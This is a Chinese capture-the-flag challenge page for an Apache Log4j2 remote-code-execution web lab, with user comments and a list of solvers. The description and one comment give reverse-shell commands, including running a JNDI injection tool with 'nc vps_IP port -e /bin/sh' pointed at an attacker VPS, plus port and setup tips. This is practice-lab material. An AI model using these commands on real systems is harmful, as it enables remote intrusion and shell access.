Apache Log4j2 RCEWEB 未解决

分数: 25 金币: 3
题目作者: 云牧青
一  血: yeedo
一血奖励: 8金币
解  决: 529
提  示: 人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描  述:
/bin/bash:x ; /bin/sh √ ; /dev/tcp × ; nc -e x ; nc a.cc 1234 -e √ ;
评论
jack12138 2年前

dnslog出不来,但是可以弹shell,估计是禁用dns请求啦?

回复 1
Wencf01 1年前

我也是能弹shell,但是弹不dnslog

回复 0

Striker123456 2年前

必须要外网的VPS么

回复 0
Striker123456 2年前

@简单的很遗憾 哎哎,我的意思是公网地址的VPS也可以把

回复 0

简单的很遗憾 2年前

这个是需要的,没有vps可以vulhub本地复现嘛

回复 1

1317554973 2年前

什么靶场啊 我都用了6金币都没成功 我百度上找一个靶场就直接成功了 骗我金币 搞毛啊

回复 0

13633953641aaa 2年前

有没有师傅遇到vps开启ldap后 telnet -p 不通的问题

回复 0

SecI302 2年前

1.通过ceye是无法判断是否存在漏洞的,但是能正常反弹shell 2.下载JNDI注入工具 3. 启动工具命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc vps_IP port -e /bin/sh" -A vps_IP启动rmi或者ldap服务设置IP工具会返回服务地址的(红色的) 4.复

回复 0

mamba24 2年前

最后一步了 端口都是通的 就是弹不回来

回复 0

丶我亚索贼六 3年前

https://blog.csdn.net/kukudeshuo/article/details/122034507 跟着来就可以了 注意自己的端口

回复 2

笨笨笨蛋 3年前

我连vps都不会搞,咋做嘛TAT

回复 3
Azureli 17天前

你比我早不会三年,战胜90%的超级大笨蛋

回复 0

mantou 2月前

三年了,不知道你写出来没有

回复 0

一只小企鹅 9月前

两年了,不知道你写出来没有(手动滑稽)

回复 1

sin@ 2年前

一年了,不知道你写出来没有

回复 0

spiritboy 3年前

一顿操作猛如虎就是没反应,后面发现是vps的网络没放开访问权限。。。。

回复 0

hem1ock 3年前

弹不回来的可以看看vps的端口是不是通的 用到的端口都要开放 8180、1099、1389 和nc监听的端口

回复 1

WriteUp

image
18634648362

6 金币

评分(6)

解题动态

19957910119 攻破了该题 12天前
Bug@Bug 攻破了该题 17天前
liusongxn 攻破了该题 1月前
lllyh 攻破了该题 1月前
Ch3ss 攻破了该题 1月前
bugtest 攻破了该题 2月前
Darling九茗 攻破了该题 2月前
MikuHacker 攻破了该题 2月前
hackerbugku 攻破了该题 2月前
450878859 攻破了该题 2月前
18940001335 攻破了该题 2月前
是大方子 攻破了该题 3月前
854396873 攻破了该题 3月前
KKsama 攻破了该题 3月前
JJJleo 攻破了该题 3月前
TTONya 攻破了该题 3月前
ZyonSec 攻破了该题 3月前
Ftcioer 攻破了该题 4月前
H0neeeeeeee 攻破了该题 4月前
雾島风起時 攻破了该题 4月前
问题反馈